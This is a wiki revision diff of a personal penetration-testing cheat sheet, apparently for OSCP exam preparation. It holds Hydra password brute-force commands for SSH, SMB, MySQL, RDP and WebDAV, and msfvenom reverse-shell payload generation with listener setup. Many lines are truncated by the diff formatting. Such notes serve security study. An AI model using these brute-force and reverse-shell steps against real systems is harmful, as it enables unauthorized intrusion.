cheat_sheets_various
Differences
This shows you the differences between two versions of the page.
Both sides previous revisionPrevious revisionNext revision | Previous revision | ||
cheat_sheets_various [2024/02/04 02:18] – [grep] gman | cheat_sheets_various [2024/02/04 03:05] (current) – [net commands (Windows)] gman | ||
---|---|---|---|
Line 143: | Line 143: | ||
===== Hydra ===== | ===== Hydra ===== | ||
- | Hydra is a very fast online password cracking tool, which can perform rapid dictionary attacks against more than 50 Protocols, including Telnet, RDP, SSH, FTP, HTTP, HTTPS, SMB, several databases and much more. | + | Hydra is extremely functional for brute-forcing MULTIPLE different protocols. |
+ | * [[https:// | ||
- | **Syntax:** To find the password for an ftp account when you know the username... | + | Specify a single |
< | < | ||
- | hydra -t 4 -l [user] -P [/ | + | hydra -l [user] -p [password] [target IP] [ftp | ssh | etc] |
- | # | + | |
- | # -t 4 | + | |
- | # -l [user] | + | |
- | # -P [/ | + | |
- | # Example: / | + | |
- | # -vV Very verbose: login+pass combo for each attempt | + | |
- | # [machine | + | |
- | # [ftp | ssh | etc] Sets the protocol | + | |
</ | </ | ||
+ | |||
+ | Specify lists of users and/or passwords to try (upper case '' | ||
+ | |||
+ | < | ||
+ | hydra -L [/ | ||
+ | </ | ||
+ | |||
+ | **Options: | ||
+ | * '' | ||
+ | * '' | ||
+ | * '' | ||
+ | * '' | ||
+ | * '' | ||
+ | * '' | ||
+ | * '' | ||
+ | |||
+ | Be very careful with your brute-force speed. You could crash the system or DoS it. | ||
+ | * The '' | ||
+ | * You could set '' | ||
+ | * Hydra actually recommends '' | ||
+ | |||
+ | **SMB:** | ||
+ | |||
+ | < | ||
+ | hydra -l admin -P / | ||
+ | </ | ||
+ | |||
+ | **SSH:** | ||
+ | |||
+ | < | ||
+ | hydra -l student -P rockyou.txt [ip] ssh | ||
+ | </ | ||
+ | |||
+ | **MySQL:** | ||
+ | |||
+ | < | ||
+ | hydra -l root -P / | ||
+ | </ | ||
+ | |||
+ | **WebDAV (http login):** | ||
+ | |||
+ | < | ||
+ | hydra -L / | ||
+ | # http-get : Indicates the protocol to be used | ||
+ | # /webdav/ : Indicates the directory where hydra can find the authentication mechanism | ||
+ | </ | ||
+ | |||
+ | **RDP:** | ||
+ | |||
+ | < | ||
+ | hydra -L users.txt -P passwords.txt [target ip] rdp -s 3333 | ||
+ | # -s : service port (if different than the default) | ||
+ | </ | ||
+ | |||
+ | **Supported services: | ||
+ | * adam6500 asterisk cisco cisco-enable cobaltstrike cvs firebird | ||
+ | * **ftp[s]** | ||
+ | * http[s]-{head|get|post} | ||
+ | * http[s]-{get|post}-form | ||
+ | * http-proxy http-proxy-urlenum | ||
+ | * icq imap[s] irc | ||
+ | * ldap2[s] ldap3[-{cram|digest}md5][s] | ||
+ | * memcached mongodb mssql mysql nntp | ||
+ | * oracle-listener oracle-sid | ||
+ | * pcanywhere pcnfs pop3[s] postgres | ||
+ | * radmin2 **rdp** redis rexec rlogin rpcap rsh rtsp | ||
+ | * s7-300 sip **smb** smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak | ||
+ | * telnet[s] vmauthd vnc xmpp | ||
+ | |||
+ | |||
---- | ---- | ||
Line 259: | Line 322: | ||
===== msfvenom ===== | ===== msfvenom ===== | ||
- | ==== Reverse Shell Payload ==== | + | To see the available payloads: '' |
+ | * [[https:// | ||
- | To generate | + | First, build a payload with MSFVenom (e.g., |
< | < | ||
- | msfvenom -p cmd/ | + | msfvenom -p windows/ |
+ | msfvenom -p cmd/ | ||
# | # | ||
# -p = payload | # -p = payload | ||
- | # lhost = our local host IP address (this is your machine' | + | # LHOST = local host IP address (this is your machine' |
- | # lport = the port to listen on (this is the port on your machine) | + | # LPORT = local port to listen on (this is the port on your machine) |
+ | # -f = format (of the output) | ||
# R = export the payload in raw format | # R = export the payload in raw format | ||
</ | </ | ||
+ | |||
+ | A **staged** payload will follow this syntax (note the delimiter): | ||
+ | * '' | ||
+ | * '' | ||
+ | | ||
+ | A **non-staged** payload will follow this syntax: | ||
+ | * '' | ||
+ | * '' | ||
After that set up a listener on your attach machine: | After that set up a listener on your attach machine: | ||
- | < | + | < |
Then copy and paste the msfvenom payload into the target box and run it. You should get a reverse shell on your attack machine. | Then copy and paste the msfvenom payload into the target box and run it. You should get a reverse shell on your attack machine. | ||
Line 280: | Line 354: | ||
---- | ---- | ||
- | ==== Notes ==== | + | ===== net commands (Windows) ===== |
- | **To-Do:** https:// | + | stuff |
+ | 1 | ||
+ | ---- | ||
- | **Source:** https:// | ||
- | |||
- | **Advice:** I intend to use some features of Metasploit for as many machines as I want on the exam. You really owe it to yourself to read the oscp-exam-guide regarding msfvenom. | ||
- | |||
- | **Additional: | ||
- | * msfvenom cheatsheet: https:// | ||
- | * To see all available payloads: '' | ||
- | |||
- | ---- | ||
===== ping ===== | ===== ping ===== |
cheat_sheets_various.1707013127.txt.gz · Last modified: by gman